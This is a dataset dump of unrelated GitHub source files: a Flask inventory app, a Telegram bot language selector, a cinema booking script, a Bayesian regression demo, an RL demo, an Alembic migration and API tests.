result\n\nprint(decode(\"10001111\"))","repo_name":"ankurgoel77/codewars","sub_path":"binaries.py","file_name":"binaries.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26944224242","text":"# NAME: Javier E. Zapanta (j.zapanta@snhu.edu)\n# DATE: 2019 May 10\n# COURSE: IT-140\n# PROGRAM: Basic Arithmetic\n#\n# PURPOSE: This program will use basic arithmetic operators to perform basic computations.\n# RUNTIME: Python 2+\n#\n# CREDIT: Knowlton, T., & Hunt, B. (2002). Introduction to Computer Science using C++ (3rd ed.). Boston, MA: Thomson Learning, Inc. 
Retrieved from http://www.programcpp.com\n\n# initialize variables to values\ni = 2\nj = 3\nk = 4\n\na = 0.5\nb = 3.0\n\n# addition\nl = i + 2\nprint (l)\n\n# subtraction\nl = l - j\nprint (l)\n\n# multiplication (*)\nl = i * j * k\nprint (l)\n\n# division (/)\nl = k / i\nprint (l)\n\n# floating-point multiplication\nc = b * a\nprint (c)\n\n# floating-point division\nc = b / a\nprint (c)\n","repo_name":"jzapanta-snhu/it-140-zapanta-examples","sub_path":"module01/03_arithmetic.py","file_name":"03_arithmetic.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6105762642","text":"from flask import ( \n render_template, \n request,\n redirect,\n url_for,\n flash\n )\nfrom app import app, db\nfrom datetime import datetime\nfrom app.database import Product, Review\nfrom app.forms import ProductForm, ReviewForm\n\n@app.route(\"/\")\ndef index():\n version = {\n \"ok\" : True,\n \"message\" : \"success\",\n \"version\" : \"1.0.0\",\n \"server_time\" : datetime.now().strftime(\"%F %H:%M:%S\")\n }\n return render_template(\"index.html\", version=version)\n\n# Read\n@app.route(\"/products\")\ndef get_products():\n products = Product.query.filter_by(active=True)\n return render_template(\"product_list.html\", product_list=products)\n\n@app.route(\"/products/<int:pid>\")\ndef get_product_detail(pid):\n product = Product.query.filter_by(id=pid).first()\n reviews = Review.query.filter_by(product_id=pid)\n return render_template(\"product_detail.html\", product=product, reviews=reviews)\n\n# Create\n@app.route(\"/products/registration\")\ndef create_product_form():\n prod_form = ProductForm()\n return render_template(\"create_form.html\", form=prod_form)\n\n@app.route(\"/products\", methods=[\"POST\"])\ndef create_product():\n \"\"\"Create a new product\"\"\"\n form = ProductForm(request.form)\n if form.validate():\n product = Product()\n product.name = form.name.data\n product.price = form.price.data\n product.quantity = form.quantity.data\n product.description = form.description.data\n product.category = form.category.data\n product.unique_tag = form.unique_tag.data\n db.session.add(product)\n db.session.commit()\n flash(f\"Product {product.name} created!\")\n return redirect(url_for('get_products'))\n\n flash(\"Invalid data\")\n return redirect(url_for('get_products'))\n\n# update product\n@app.route(\"/products/modifications/<int:pid>\")\ndef update_product_form(pid):\n form = ProductForm()\n product = Product.query.filter_by(id=pid).first()\n return render_template(\"update_form.html\", form=form, product=product)\n\n@app.route(\"/products/<int:pid>\", methods=[\"POST\"])\ndef update_product(pid):\n form = ProductForm(request.form)\n if (form.validate()):\n product = Product.query.filter_by(id=pid).first()\n product.name = form.name.data\n product.price = form.price.data\n product.quantity = form.quantity.data\n product.description = form.description.data\n product.category = form.category.data\n product.unique_tag = form.unique_tag.data\n db.session.commit()\n flash(f\"Product {product.name} Updated!\")\n return redirect(url_for('get_products'))\n \n flash(\"Invalid Data!\")\n return redirect(url_for('get_products'))\n\n# Delete\n@app.route(\"/products/delete/<int:pid>\", methods=[\"POST\"])\ndef delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_products'))\n\n product.active = 
False\n db.session.commit()\n flash(f\"Product {product.name} Deleted!\")\n return redirect(url_for('get_products'))\n \n# Undo delete\n@app.route(\"/products/deleted\")\ndef get_deleted_products():\n products = Product.query.filter_by(active=False)\n return render_template(\"product_list_deleted.html\", product_list=products)\n\n@app.route(\"/products/undo_delete/<int:pid>\", methods=[\"POST\"])\ndef undo_delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_deleted_products'))\n\n product.active = True\n db.session.commit()\n flash(f\"Product {product.name} Restored!\")\n return redirect(url_for('get_deleted_products'))\n\n # Hard delete\n@app.route(\"/products/hard_delete/<int:pid>\", methods=[\"POST\"])\ndef hard_delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_deleted_products'))\n\n db.session.delete(product)\n db.session.commit()\n flash(f\"Product {product.name} deleted completely from Database!\")\n return redirect(url_for('get_deleted_products'))\n\n\n# Create Review\n@app.route(\"/review/create_form/<int:pid>\")\ndef create_review_form(pid):\n product = Product.query.filter_by(id=pid).first()\n review_form = ReviewForm()\n return render_template(\"create_review_form.html\", form=review_form, product=product)\n\n@app.route(\"/review/<int:pid>\", methods=[\"POST\"])\ndef create_review(pid):\n \"\"\"Creating a review\"\"\"\n form = ReviewForm(request.form)\n\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_products'))\n if form.validate():\n review = Review()\n review.author = form.author.data\n review.rating = form.rating.data\n review.review_text = form.review_text.data\n review.product_id = form.product_id.data\n db.session.add(review)\n db.session.commit()\n flash(f\"Review created!\")\n return redirect(url_for('get_product_detail', pid=pid))\n\n flash(\"Invalid data\")\n return redirect(url_for('get_product_detail', pid=pid))","repo_name":"jmacach1/flask_inventory_manager","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7167874096","text":"import gym\nimport panda_gym\nfrom stable_baselines3 import PPO, SAC\nfrom sb3_contrib import TQC\nimport custom_envs\n\n\"\"\"\nenv_list = ['My_PandaReach', 'Two_PandaReach', 'Three_PandaReach',\n 'My_PandaSlide',\n 'My_PandaPickAndPlace', 'My_TwoPandaPickAndPlace',\n 'Two_PandaPush', 'Three_PandaPush',\n 'Two_Obj_PandaPush', 'Three_Obj_PandaPush',\n 'My_PandaReachPlate', 'My_TwoPandaReachPlate',\n 'My_PandaStack']\n\nenv_opts = ['Joints', 'Dense']\n\"\"\"\n\nenv_id = 'My_PandaReachJointsDense'\nalgorithm_name = 'TQC'\n\nenv = gym.make(env_id + '-v1', render=True)\n\ncommand = algorithm_name + \".load('./trained/' + env_id + '/' + env_id + algorithm_name, env=env)\"\n\nmodel = eval(command)\n\nobs = env.reset()\nfor i in range(1000):\n action, _state = model.predict(obs, deterministic=True)\n obs, reward, done, info = env.step(action)\n print(info)\n env.render()\n if done:\n print('Done')\n obs = 
env.reset()\n","repo_name":"zeyang23/panda_robot_task","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"1425205682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from bot_log import log_file\n\n\nfrom collections import UserDict\nimport pickle\nimport telebot\nfrom phrases_list import help_bot\nfrom bot_token import bot\nfrom telebot import types\n\n\nclass Singleton(object):\n _instance = None\n\n\n def __new__(class_, *args, **kwargs):\n\n if not isinstance(class_._instance, class_):\n class_._instance = object.__new__(class_, *args, **kwargs)\n\n return class_._instance\n \nclass UserLang(Singleton, UserDict):\n\n def add_data(self, user_id, lang_dict) -> None:\n \n self.load_data()\n\n if user_id in self.data:\n self.data[user_id].update(lang_dict)\n\n else:\n self.data[user_id] = lang_dict\n self.save_data()\n\n def delete_data(self, user_id, key_lang) -> None:\n self.load_data()\n if user_id in self.data:\n del self.data[user_id][key_lang]\n self.save_data()\n\n def save_data(self) -> None:\n\n with open(\".\\\\user_lang_dict.bin\", \"wb\") as file:\n pickle.dump(self.data, file)\n\n\n def load_data(self) -> None:\n\n try:\n\n with open(\".\\\\user_lang_dict.bin\", \"rb\") as file:\n self.data = pickle.load(file)\n return self.data \n\n except FileNotFoundError:\n\n with open(\".\\\\user_lang_dict.bin\", \"wb\") as file:\n pickle.dump({}, file)\n\n with open(\".\\\\user_lang_dict.bin\", \"rb\") as file:\n return \n\nLANG_DICT = {\n\"af\": \"afrikaans\", \"sq\": \"albanian\", \"am\": \"amharic\", \"ar\": \"arabic\", \"hy\": \"armenian\", \"az\": \"azerbaijani\", \n\"eu\": \"basque\", \"be\": \"belarusian\", \"bn\": \"bengali\", \"bs\": \"bosnian\", \"bg\": \"bulgarian\", \"ca\": \"catalan\", \"ceb\": \"cebuano\", \n\"ny\": \"chichewa\", \"zh-cn\": \"chinese - simplified\", \"zh-tw\": \"chinese - traditional\", \"co\": \"corsican\", \"hr\": \"croatian\", \n\"cs\": \"czech\", \"da\": \"danish\", \"nl\": \"dutch\", \"en\": \"english\", \"eo\": \"esperanto\", \"et\": \"estonian\", \"tl\": \"filipino\", \"fi\": \"finnish\", \n\"fr\": \"french\", \"fy\": \"frisian\", \"gl\": \"galician\", \"ka\": \"georgian\", \"de\": \"german\", \"el\": \"greek\", \"gu\": \"gujarati\", \"ht\": \"haitian creole\", \n\"ha\": \"hausa\", \"haw\": \"hawaiian\", \"iw\": \"hebrew iw\", \"he\": \"hebrew\", \"hi\": \"hindi\", \"hmn\": \"hmong\", \"hu\": \"hungarian\", \"is\": \"icelandic\", \n\"ig\": \"igbo\", \"id\": \"indonesian (bahasa)\", \"ga\": \"irish\", \"it\": \"italian\", \"ja\": \"japanese\", \"jw\": \"javanese\", \"kn\": \"kannada\", \"kk\": \"kazakh\", \n\"km\": \"khmer\", \"ko\": \"korean\", \"ku\": \"kurdish (kurmanji)\", \"ky\": \"kyrgyz\", \"lo\": \"lao\", \"la\": \"latin\", \"lv\": \"latvian\", \"lt\": \"lithuanian\", \n\"lb\": \"luxembourgish\", \"mk\": \"macedonian\", \"mg\": \"malagasy\", \"ms\": \" \", \"ml\": \"malayalam\", \"mt\": \"maltese\", \"mi\": \"maori\", \n\"mr\": \"marathi\", \"mn\": \"mongolian\", \"my\": \"myanmar (burmese)\", \"ne\": \"nepali\", \"no\": \"norwegian\", \"or\": \"odia\", \"ps\": \"pashto\", \n\"fa\": \"persian\", \"pl\": \"polish\", \"pt\": \"portuguese\", \"pa\": \"punjabi\", \"ro\": \"romanian\", \"ru\": \"russian\", \"sm\": \"samoan\", \n\"gd\": \"scots gaelic\", \"sr\": \"serbian\", \"st\": \"sesotho\", \"sn\": \"shona\", \"sd\": \"sindhi\", \"si\": \"sinhala\", \"sk\": \"slovak\", \"sl\": \"slovenian\", 
\n\"so\": \"somali\", \"es\": \"spanish\", \"su\": \"sundanese\", \"sw\": \"swahili\", \"sv\": \"swedish\", \"tg\": \"tajik\", \"ta\": \"tamil\", \"te\": \"telugu\", \n\"th\": \"thai\", \"tr\": \"turkish\", \"uk\": \"ukrainian\", \"ur\": \"urdu\", \"ug\": \"uyghur\", \"uz\": \"uzbek\", \"vi\": \"vietnamese\", \"cy\": \"welsh\", \n\"xh\": \"xhosa\", \"yi\": \"yiddish\", \"yo\": \"yoruba\", \"zu\": \"zulu\"}\n\n\nlang_transl = UserLang()\ninput_lang = \"en\"\nfind_lang = {}\n\n\ndef chose_button(message, id_mess, text=\"\", flag_dict=None):\n\n if message.chat.id not in lang_transl:\n lang_transl[message.chat.id] = {}\n if flag_dict == \"added\":\n keyboard = types.InlineKeyboardMarkup()\n bt_in_line = []\n for bt_callback, bt_name in find_lang[message.chat.id].items():\n key_lang = types.InlineKeyboardButton(text=bt_name, callback_data=f\"added_new,{bt_callback},{bt_name}\")\n bt_in_line.append(key_lang)\n keyboard.row_width = 3\n lang_list = []\n for value in lang_transl[message.chat.id].values():\n lang_list.append(value)\n page_lange(message, id_mess, keyboard, bt_in_line, f\"I have chosen {len(lang_list)} languages for you:\\n{', '.join(lang_list)}\\nClick to choose the ones you need\")\n return\n\n elif flag_dict == \"\":\n keyboard = types.InlineKeyboardMarkup()\n bt_in_line = []\n for bt_callback, bt_name in lang_transl[message.chat.id].items():\n key_lang = types.InlineKeyboardButton(text=bt_name, callback_data=f\"delete_lang,{bt_callback}\")\n bt_in_line.append(key_lang)\n keyboard.row_width = 3\n lang_list = []\n for value in lang_transl[message.chat.id].values():\n lang_list.append(value)\n page_lange(message, id_mess, keyboard, bt_in_line, f\"You have chosen {len(lang_list)} languages:\\n{', '.join(lang_list)}\\nClick to delete the ones you don't need\")\n return\n\n return id_mess\n\n\ndef page_lange(message, id_mess, keyboard, bt_in_line, text):\n keyboard.add(*bt_in_line) \n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n key_find = types.InlineKeyboardButton(text=\"Search and add languages\", callback_data=\"find_again\")\n keyboard.add(key_menu, key_find) \n id_mess = bot.edit_message_text(text, chat_id=message.chat.id, message_id=id_mess.message_id, reply_markup=keyboard)\n return\n\n\ndef chose_lang(message, id_mess):\n if id_mess.message_id != message.message_id:\n bot.delete_message(message.chat.id, message.message_id)\n\n len_list_keys = []\n len_list_values = []\n user_input = message.text.lower().split(\"\\n\")\n if len(user_input) == 1:\n user_input = message.text.lower().split(\",\")\n \n for trans_lang, all_name_lang in LANG_DICT.items():\n for find_lang in user_input:\n find_lang = find_lang.strip()\n if (find_lang in all_name_lang) or (find_lang in trans_lang):\n len_list_keys.append(trans_lang)\n len_list_values.append(all_name_lang)\n if len_list_keys == []:\n try:\n id_mess = chose_button(message, id_mess, \"No results\")\n except telebot.apihelper.ApiTelegramException:\n pass\n # return find_again(message)\n return list_lang(message, len_list_keys, len_list_values, id_mess)\n\n\ndef list_lang(message, len_list_keys, len_list_values, id_mess):\n global find_lang\n\n find_lang[message.chat.id] = dict(zip(len_list_keys, len_list_values))\n id_mess = chose_button(message, id_mess, f\"You have chosen {len(find_lang)} languages:\\nClick to delete the ones you don't need\", flag_dict=\"added\")\n return id_mess\n\n\ndef exit_menu(call):\n help_keys, help_text = help_bot(call.message)\n message = call.message\n 
bot.clear_step_handler_by_chat_id(chat_id=message.chat.id)\n bot.edit_message_text(help_text, chat_id=message.chat.id, message_id=message.message_id, reply_markup=help_keys)\n return \n\n\ndef find_again(call):\n lang_transl.load_data()\n keyboard = types.InlineKeyboardMarkup()\n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n keyboard.add(key_menu) \n id_mess = bot.edit_message_text(\"Enter language to translate:\", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=keyboard)\n return bot.register_next_step_handler(call.message, chose_lang, id_mess)\n\n\ndef added_find_lang(message):\n global find_lang\n global lang_transl\n\n lang_transl.add_data(message.message.chat.id, {message.data.split(\",\")[1] : message.data.split(\",\")[2]})\n del find_lang[message.message.chat.id][message.data.split(\",\")[1]]\n chose_button(message.message, message.message, text=\"\", flag_dict=\"added\")\n\n\ndef delete_find_lang(message):\n lang_transl.delete_data(message.message.chat.id, message.data.split(\",\")[1])\n chose_button(message.message, message.message, text=\"\", flag_dict=\"\")\n\n\nCHANGE_LANG_DICT = {\n \"menu\":exit_menu,\n \"find_again\":find_again,\n \"delete_lang\":delete_find_lang,\n \"added_new\":added_find_lang,\n }\n\n\n@bot.callback_query_handler(func=lambda callback: callback.data.split(\",\")[0] in [\"menu\", \"added_new\", \"find_again\", \"delete_lang\", ])\ndef start_change_lang(call, id_mess=None):\n keyboard = types.InlineKeyboardMarkup()\n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n keyboard.add(key_menu) \n\n if type(call) == telebot.types.CallbackQuery:\n func = CHANGE_LANG_DICT.get(call.data.split(\",\")[0])\n func(call)\n message = call.message \n return\n else:\n message = call\n func = CHANGE_LANG_DICT.get(message.text)\n if func != None:\n func(message)\n return\n if id_mess == None:\n id_mess = message\n id_mess = bot.edit_message_text(\"Write the language of the translation to search for it:\", chat_id=message.chat.id, message_id=id_mess.message_id, reply_markup=keyboard)\n bot.register_next_step_handler(message, chose_lang, id_mess)\n return\n","repo_name":"DioSWolF/MyProjects","sub_path":"TeleBot/change_lang_translate.py","file_name":"change_lang_translate.py","file_ext":"py","file_size_in_byte":9140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5796372291","text":"\"\"\"This Program Works with a Cinema Hall.\nCreated by: Md. Samiul Basir\nEmail: turjotasin@gmail.com\n\"\"\"\n\n\n\nimport string\n\n\n#QUESTION 1\"\"\"\nclass Star_Cinema:\n def __init__(self):\n self.hall_list = []\n\n def entry_hall(self, hall_no):\n self.hall_list.append(hall_no)\n\n#QUESTION 2\"\"\"\nclass Hall(Star_Cinema):\n def __init__(self, rows, cols, hall_no):\n self.rows = int(rows)\n self.cols = int(cols)\n self. hall_no = hall_no\n self.seats = []\n self.show_list =[]\n self.show_id = []\n super().__init__()\n self.entry_hall(self.hall_no)\n\n #QUESTION 3\"\"\"\n def entry_show(self, id, movie_name, time):\n self.id = int(id)\n add = [id, movie_name, time]\n bro = tuple(add)\n tempseats = []\n self.show_list.append(bro)\n for items in enumerate(self.show_list):\n for i in range(self.rows):\n a = []\n for j in range(self.cols):\n a.append(f'{i}{j}')\n tempseats.append(a)\n self.seats.append(tempseats)\n\n\n self.show_id. 
append(self.show_list[self.id-1][0])\n\n #QUESTION 4\"\"\"\n def book_seats(self, customer_name, phone_number, id, row, column):\n\n #QUESTION 9\"\"\"\n self.__customer_name = customer_name\n self.__phone_number = phone_number\n self.id = int(id)\n #Id of the show er oikhane giye seat book korte hobe\n a = int(row)\n b = int(column)\n self.seats[self.id-1][a][b] = 'X'\n\n#QUESTION 5\"\"\"\n def view_show_list(self):\n for item in self.show_list:\n for values in item:\n print(values.ljust(20), end= ' ')\n print()\n\n#QUESTION 6\"\"\"\n def view_available_seats(self, id):\n print('PRINTING THE AVAILABLE SEATS'.center(65))\n print('______________________________________________________________________'.center(50))\n print('----------------------------------------------------------------------'.center(50))\n for i in range(self.rows):\n for j in range(self.cols):\n print(self.seats[int(id)-1][i][j].ljust(10), end=' ')\n print()\n\n print('----------------------------------------------------------------------\\n\\n')\n\n\n\na = Hall(4, 6, 12)\n#Adding some shows here\na.entry_show(id= '1', movie_name= 'The Platform', time = 'Nov 15, 2022')\na.entry_show(id= '2', movie_name= 'Siccin', time = 'Nov 12, 2023')\na.entry_show(id= '3', movie_name= 'The Green Mile', time = 'Nov 14, 2023')\n\n#\"QUESTION 7\"\"\"\nwhile(True):\n case = int(input('1. VIEW ALL SHOWS TODAY \\n'\n '2. VIEW ALL SEATS \\n'\n '3. BOOK TICKET\\n'\n '4. END PROCESS\\n'))\n if case ==1:\n print('ID'.ljust(21), 'MOVIE NAME'.ljust(21), 'TIME'.ljust(20))\n print('_________________________________________________________')\n print('---------------------------------------------------------')\n a.view_show_list()\n print('---------------------------------------------------------')\n print('\\n\\n')\n elif case ==2:\n id = int(input('ENTER SHOW ID: '))\n a.view_available_seats(id)\n elif case ==3:\n\n customer_name = input('NAME:')\n phone_number = input('PHONE NUMBER: ')\n\n # CHECKING THE SHOW ID IS CORRECT OR NOT\n while (True):\n id = input('ENTER SHOW ID: ')\n if id in a.show_id:\n break\n else:\n print(f\"========================================\")\n print(f\"!!!WRONG SHOW ID! ENTER SHOW_ID AGAIN!!!\")\n print(f\"========================================\")\n continue\n\n\n occupied = 0\n for item in a.seats:\n for inner_item in item:\n for ekdom_vitorer_item in inner_item:\n if ekdom_vitorer_item =='X':\n occupied += 1\n while(True):\n number_of_tickets = int(input(f\"ENTER NUMBER OF TICKETS YOU WANT TO BUY (Max {24-occupied}): \"))\n if number_of_tickets>(24-occupied):\n print(\"_____________ERROR KHAISEN VAI ABAR_____________\".center(50))\n print(\"!!!ETOGULA SEAT NAI VAI AMADER! GUSHTI NIYA ASHBEN NAKI?!!!\".center(50))\n print(\"___________________________________________________________\".center(50))\n else:\n break\n\n\n\n booked_seats = []\n i=0\n while(i<number_of_tickets):\n seat_no = input('ENTER SEAT NO:')\n if ((int(seat_no[0]) < a.rows and int(seat_no[1]) < a.cols) and len(seat_no)==2):\n if a.seats[a.id - 1][int(seat_no[0])][int(seat_no[1])] != 'X':\n a.book_seats(customer_name, phone_number, id, seat_no[0], seat_no[1])\n i= i+1\n booked_seats.append(seat_no)\n\n else:\n print('!!! WRONG SEAT NUMBER. ENTER SEAT NUMBER AGAIN !!!')\n\n\n print(\"-------CONGRATUALATIONS! 
BOOKED SEATS SUCCESSFULLY-------\".center(50))\n print(f\"-------BOOKED SEATS: {booked_seats}-------\".center(50))\n print(\"___________________________________________________________\".center(50))\n a.view_available_seats(id)\n print(\"\\n\"*3)\n\n\n elif case ==4:\n break\n else:\n print(\"_____________ERROR KHAISEN VAI ABAR_____________\".center(50))\n print('WRONG CHOICE! PLEASE ENTER CHOICE AGAIN')\n print(\"___________________________________________________________\".center(50))\n\n\n\n","repo_name":"basirtasin/OOP-project-on-Ticket-Booking-in-cinema-Hall-using-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36315317985","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\nfrom animation import AnimDrawer\n\nclass BayezianRegression():\n \"\"\"\n linear regression model by using bayezian estimation\n\n Attributes\n ------------\n M : int\n model dimention\n lam : float\n precision, parameter of model, inverse of variance\n pre_m : float\n mean\n pre_co_precision : float\n precision\n m : numpy.ndrray\n mean\n co_precision : numpy.ndarray\n precision\n m_opt : numpy.ndarray\n estimated mean\n lam_inv_opt : numpy.ndarray\n estimated variance\n \"\"\"\n def __init__(self, M):\n self.M = M # モデルの次元\n self.lam = 10. # モデルの精度(既知)\n\n # 事前分布のパラメータ\n self.pre_m = np.zeros(self.M) # 平均\n self.pre_co_precision = np.diag(np.eye(self.M)) # 共分散行列\n\n # 事後分布のパラメータ\n self.m = np.zeros(self.M) # 平均\n self.co_precision = np.diag(np.ones(self.M)) # 共分散行列\n\n # 予測分布のパラメータ\n self.m_opt = None\n self.lam_inv_opt = None\n\n def fit(self, X_data, Y_data):\n \"\"\"\n fit the model by using input data and output data\n\n Parameters\n -----------\n X_data : numpy.ndarray, shape(N, M)\n Y_data : numpy.ndarray, shape(N, ) \n \"\"\"\n\n self.co_precision = self.lam * np.dot(X_data.T, X_data) + self.co_precision\n print(\" np.dot(X_data.T, X_data) = {0}\".format( np.dot(X_data.T, X_data)))\n\n temp_1 = np.linalg.inv(self.co_precision)\n temp_2 = self.lam * (np.dot(Y_data, X_data) + np.dot(self.co_precision, self.m))\n print(\"temp_1 = {0}\".format(temp_1))\n print(\"temp_2 = {0}\".format(temp_2))\n\n self.m = np.dot(temp_1, temp_2.reshape(-1, 1))\n\n print(\"m = {0}\".format(self.m))\n\n def predict_distribution(self, X_data):\n \"\"\"\n make the distributionBayes\n Bayes\n Parameters\n ------------\n X_data : numpy.ndarray, shapeBayes(M, )\n\n Returns\n ---------\n m_opt : float\n estimated mean\n lam_inv_opt : float\n estimated variance\n deviation : float\n estimated deviation\n \"\"\"\n self.m_opt = np.dot(self.m.flatten(), X_data.reshape(-1, 1))\n\n temp_1 = np.linalg.inv(self.co_precision)\n self.lam_inv_opt = 1. 
/ self.lam + np.dot(X_data, np.dot(temp_1, X_data.reshape(-1, 1)))\n deviation = math.sqrt(self.lam_inv_opt)\n\n return self.m_opt, self.lam_inv_opt, deviation\n\n def test_distribution(self):\n \"\"\"test\n This is test program for if it can make the gauss distribution\n Returns\n ---------\n w : numpy.ndarray\n parameter of linear regression\n true_ys : numpy.ndarray\n observation value made without noise\n sample_ys : numpy.ndarray\n observation value made with noise\n \"\"\"\n # wを計算\n w = np.random.multivariate_normal(self.m, np.linalg.inv(self.co_precision))\n\n sample_ys = []\n true_ys = []\n\n for sample_x in np.arange(-1, 1, 0.05):\n # sampling\n xs = [1.]\n for _ in range(self.M-1):\n xs.append(xs[-1] * sample_x)\n\n xs = np.array(xs)\n \n m = np.dot(w, xs.reshape(-1, 1))\n lam_inv = 1./ self.lam\n y = np.random.multivariate_normal(m, [[lam_inv]])\n sample_ys.append(y)\n true_ys.append(m)\n\n return w, true_ys, sample_ys\n\ndef main():\n # iteration number\n iteration_num = 50\n\n # history\n history_means = []\n history_deviations = []\n history_points = []\n # make data set\n X_data = []\n Y_data = []\n\n for _ in range(iteration_num):\n # make model\n dim = 10 # dimention of the linear regression model\n regressioner = BayezianRegression(dim) # make model\n\n # make data \n x_1 = (7.5 + 1.) * np.random.rand() + (- 1.)\n y = math.sin(x_1)\n temp_xs = [1.]\n for _ in range(dim-1):\n temp_xs.append(temp_xs[-1] * x_1)\n \n X_data.append(temp_xs)\n Y_data.append(y)\n # save\n history_points.append([x_1, y])\n \n # to numpy\n X_data = np.array(X_data)\n Y_data = np.array(Y_data)\n\n # fit the model\n regressioner.fit(X_data, Y_data)\n\n # prediction \n mus = []\n devs = []\n \n for sample_x in np.arange(-1., 7.5, 0.1):\n # make X_data\n x_data = [1.]\n for _ in range(dim-1):\n x_data.append(x_data[-1] * sample_x)\n\n mu_opt, lam_inv_opt, deviation = regressioner.predict_distribution(np.array(x_data))\n\n mus.append(mu_opt)\n devs.append(deviation)\n \n mus = np.array(mus).flatten()\n devs = np.array(devs)\n\n # save\n history_means.append(mus)\n history_deviations.append(devs)\n\n X_data = X_data.tolist()\n # print(\"X\\data = {0}\".format(X_data))\n Y_data = Y_data.tolist()\n\n draw_obj = [np.array(history_points), history_means, history_deviations]\n animdrawer = AnimDrawer(draw_obj)\n animdrawer.draw_anim()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shunichi09/Bayesian_Inference_training","sub_path":"3rd/linear_regression_with_animation.py","file_name":"linear_regression_with_animation.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37948589312","text":"\"\"\"add description field to model\n\nRevision ID: 0c3e4fd362de\nRevises: b4c5225515f1\nCreate Date: 2022-05-18 12:43:20.709606\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"0c3e4fd362de\"\ndown_revision = \"b4c5225515f1\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n \"model\",\n sa.Column(\n \"description\", sa.VARCHAR(), server_default=\"\", nullable=False\n ),\n )\n\n\ndef downgrade():\n op.drop_column(\"model\", 
\"description\")\n","repo_name":"epam/badgerdoc","sub_path":"models/alembic/versions/0c3e4fd362de_add_description_field_to_model.py","file_name":"0c3e4fd362de_add_description_field_to_model.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"29173491807","text":"\"\"\"Tests project modify API.\"\"\"\n\nimport pytest\nimport http.client\n\nfrom infra.walle.server.tests.lib.util import TestCase\nfrom walle.constants import TESTING_ENV_NAME\n\n\n@pytest.fixture\ndef test(request, monkeypatch_production_env):\n test = TestCase.create(request)\n test.mock_projects()\n return test\n\n\n@pytest.fixture\ndef mocked_project(test):\n project = test.mock_project({\"id\": \"orig-id\", \"name\": \"Some name\"})\n return project\n\n\n@pytest.yield_fixture()\ndef project_idm_push_called(enable_idm_push, project_idm_add_role_nodes_mock, project_idm_request_project_roles_mock):\n yield\n assert project_idm_add_role_nodes_mock.called\n assert project_idm_request_project_roles_mock\n\n\ndef call_clone_api(test, orig_id=\"orig-id\", new_id=\"new-id\", new_name=\"New name\"):\n return test.api_client.open(\"/v1/projects/clone/\" + orig_id, method=\"POST\", data={\"id\": new_id, \"name\": new_name})\n\n\n@pytest.mark.usefixtures(\"unauthenticated\", \"mocked_project\")\ndef test_unauthenticated(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.UNAUTHORIZED\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"unauthorized_project\", \"mocked_project\")\ndef test_unauthorized(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.FORBIDDEN\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_push_called\")\ndef test_normal_clone(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.CREATED\n\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\")\ndef test_original_doesnt_exist(test):\n result = call_clone_api(test, orig_id=\"nonexistent-id\")\n assert result.status_code == http.client.NOT_FOUND\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_add_role_nodes_mock\", \"project_idm_request_project_roles_mock\")\ndef test_duplicated_name(test):\n call_clone_api(test, new_id=\"new-id\")\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n\n result = call_clone_api(test, new_id=\"new-id\")\n assert result.status_code == http.client.CONFLICT\n\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\")\ndef test_clone_name_conflict(test):\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"})\n\n result = call_clone_api(test, new_id=\"new-id\")\n assert result.status_code == http.client.CONFLICT\n\n test.projects.assert_equal()\n\n\ndef test_clone_wrong_env_regular_user(test, mp):\n env_name = TESTING_ENV_NAME\n mp.config(\"environment.name\", env_name)\n result = call_clone_api(test)\n assert result.status_code == http.client.FORBIDDEN\n assert result.json[\n \"message\"\n ] == \"Authorization failure: This method is available only for Wall-E admins on {} environment.\".format(env_name)\n\n 